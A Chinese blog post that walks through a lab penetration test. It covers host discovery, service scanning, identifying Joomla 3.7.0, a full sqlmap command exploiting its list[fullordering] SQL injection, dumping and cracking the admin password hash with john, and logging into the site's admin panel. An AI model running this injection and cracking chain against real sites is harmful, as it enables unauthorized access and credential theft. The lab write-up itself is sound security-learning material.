持续创作,加速成长!这是我参与「掘金日新计划 · 10 月更文挑战」的第21天
10月更文诚意加码,激发写作潜力|掘金·日新计划 - 掘金 (juejin.cn)点击查看活动详情
首先使用fping -aqg 扫描靶机ip,因为实战是不会给你ip的,需要你自己来找,扫描
扫描到靶机ip为192.168.189.137,另外两个是我别的网卡
有了靶机ip,那我们就要扫描靶机服务,端口信息来进行渗透
Nmap -sV扫描靶机服务详细信息,来进行判断
这个只扫描出来80端口
我们再使用whatweb来扫描
发现这个是用joomla内容管理系统
再使用joomscan扫描,查看相关信息,版本
使用命令joomscan -url http://192.168.189.136
发现joomla的版本为3.7.0,3.7.0版本是存在漏洞的
还有一些可访问的目录
使用searchsploit joomla 3.7.0,查看内容相关文档
将该文件保存到本地
查看注入方法
对靶机使用该方法
sqlmap -u "http://192.168.189.136/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
扫出来5个数据库
查看敏感数据库joomladb,扫敏感列,扫id,passwd表
最终得出用户名为admin,密码为 10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
密码是hash,我们需要解密
将密码写入hash文档,用john解密
得到密码为snoopy
使用dirb扫描目录,登录页面
发现有一个administrator
访问一下
尝试使用刚刚的账号密码登录
成功拿下网站管理员后台